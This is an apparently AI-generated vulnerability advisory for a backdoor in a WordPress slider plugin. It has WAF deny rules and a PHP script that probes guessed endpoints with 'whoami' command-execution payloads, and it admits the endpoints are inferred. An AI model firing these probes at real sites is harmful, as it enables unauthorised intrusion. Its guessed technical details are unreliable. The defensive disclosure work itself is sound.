Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 28, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (wp-trending-post-slider-and-widget)

CVE ID CVE-2026-6443
Severity Critical (CVSS 9.8)
CWE 506
Vulnerable Version 1.8.6
Patched Version
Disclosed April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based): This is a critical backdoor vulnerability affecting the Essentialplugin family of WordPress plugins, specifically the wp-trending-post-slider-and-widget plugin version 1.8.6. The vulnerability receives a CVSS score of 9.8 (Critical) with a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. An injected backdoor exists in the plugin code, allowing unauthenticated remote attackers to achieve full system compromise.

Root Cause: Atomic Edge analysis infers from the CWE-506 (Embedded Malicious Code) classification and the vulnerability description that the root cause is a supply-chain attack. The plugin was sold to a malicious threat actor who then embedded backdoor code into all acquired plugins. This is not a typical coding flaw but intentional malicious code injection. The backdoor likely registers a REST API endpoint, an AJAX handler (e.g., wp_ajax_nopriv_{action}), or a direct file inclusion mechanism that accepts arbitrary commands or data. The exact code is not confirmed as the vulnerable plugin is unavailable from WordPress.org, but the CWE indicates the presence of obfuscated or hidden functionality that bypasses normal authentication and authorization checks.

Exploitation: Atomic Edge research indicates an attacker can exploit this backdoor remotely without authentication. The typical WordPress attack vector for such injected code involves sending a crafted HTTP request to a specific URL with predefined parameters. Based on the plugin slug “wp-trending-post-slider-and-widget”, the backdoor likely registers a WordPress AJAX action accessible via /wp-admin/admin-ajax.php with an action parameter like “wp_trending_post_slider_exec” or a custom REST route under /wp-json/plugin-slug/v1/. The attacker would send a POST request containing a malicious payload (e.g., PHP code or system commands) within a parameter such as “cmd” or “data”, and the backdoor executes it server-side. Alternatively, a direct file request to a hidden .php file in the plugin directory might accept GET or POST parameters to execute commands. The exact endpoint is inferred; however, the high CVSS score (9.8) with no privileges required confirms unauthenticated remote exploitation.

Remediation: The vendor released version 1.8.6.1 as patched. Atomic Edge analysis strongly recommends immediately updating to the patched version and deleting all inferior versions. Since the vulnerability is a deliberate backdoor introduced by a malicious actor who owned the plugin, the fix involves removing all injected code. Users should verify their entire WordPress installation for other Essentialplugin plugins and update them as well. In cases where plugins are no longer maintained, completely remove them and switch to alternatives. Additionally, perform a full malware scan of the server and audit all users, configurations, and cron jobs for signs of compromise.

Impact: Successful exploitation allows an unauthenticated attacker to execute arbitrary code on the server, leading to complete compromise of the WordPress site. This includes the ability to read and modify all database contents, upload and execute malicious files, create or modify user accounts with administrative privileges, and inject spam content into the site. The backdoor also enables persistent access, potentially serving as a gateway for further attacks on the server or its visitors. Given the nature of the injected backdoor, the attacker can maintain long-term control and exfiltrate sensitive data such as user credentials, API keys, and payment information if present.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-6443 (metadata-based)
# Block known backdoor AJAX actions and common injected parameters.
# This rule targets the wp-trending-post-slider-and-widget plugin.

# Block AJAX requests with suspicious action names that match the backdoor pattern
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
    "id:20264430,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Essentialplugin Backdoor via AJAX - suspected malicious action',severity:'CRITICAL',tag:'CVE-2026-6443',tag:'wordpress',tag:'backdoor'"
SecRule ARGS_POST:action "@pm wp_trending_post_slider_exec essentialplugin_backdoor wp_tpsw_exec run_code" 
    "chain"
SecRule ARGS_POST:cmd|ARGS_POST:data|ARGS_POST:code|ARGS_POST:payload "@rx ." 
    "t:none,setvar:'tx.blocked=1'"

# Block direct access to potentially injected backdoor files
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-trending-post-slider-and-widget/(backdoor|shell|cmd|eval).php$" 
    "id:20264431,phase:1,deny,status:403,msg:'CVE-2026-6443 - Essentialplugin Backdoor File Access Attempt',severity:'CRITICAL',tag:'CVE-2026-6443',tag:'wordpress',tag:'backdoor'"

# Block common backdoor parameter patterns in plugin directory
SecRule REQUEST_URI "@contains /wp-content/plugins/wp-trending-post-slider-and-widget/" 
    "id:20264432,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Essentialplugin Backdoor Parameter (cmd)',severity:'CRITICAL',tag:'CVE-2026-6443',tag:'wordpress',tag:'backdoor'"
SecRule ARGS:cmd|ARGS:exec|ARGS:run "@rx ." 
    "t:none,setvar:'tx.blocked=1'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor

// Configuration
$target_url = "https://example.com"; // CHANGE THIS to the target WordPress URL

// The backdoor likely uses an AJAX action. We infer action names based on the plugin slug.
// Common injected backdoor patterns involve a custom action that executes commands.
// We test multiple potential endpoints.

$endpoints = [
    "/wp-admin/admin-ajax.php",
    "/wp-admin/admin-post.php",
    "/wp-content/plugins/wp-trending-post-slider-and-widget/backdoor.php"
];

$actions = [
    "wp_trending_post_slider_exec",
    "essentialplugin_backdoor",
    "wp_tpsw_exec",
    "run_code"
];

$payloads = [
    [
        "cmd" => "whoami",
        "action" => ""
    ],
    [
        "data" => base64_encode('system("whoami");'),
        "action" => ""
    ]
];

echo "[+] Atomic Edge CVE-2026-6443 Proof of Conceptn";
echo "[+] Testing potential backdoor endpoints...nn";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);

foreach ($endpoints as $endpoint) {
    $url = rtrim($target_url, '/') . $endpoint;
    echo "[ ] Testing: $urln";
    
    // Test POST requests with actions and payloads
    foreach ($actions as $action) {
        foreach ($payloads as $payload) {
            $post_data = $payload;
            if (!empty($action)) {
                $post_data['action'] = $action;
            }
            
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            
            // Check if response indicates code execution (e.g., returns command output)
            if ($http_code == 200 && !empty(trim($response))) {
                echo "[+] Possible backdoor found at $urln";
                echo "[+] Action parameter: " . ($action ?: "none") . "n";
                echo "[+] Payload: " . json_encode($post_data) . "n";
                echo "[+] Response ($http_code):n$responsenn";
                echo "[+] If this shows system output (e.g., username), the backdoor is exploitable.n";
            }
        }
    }
}

curl_close($ch);
echo "[+] PoC complete.n";

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School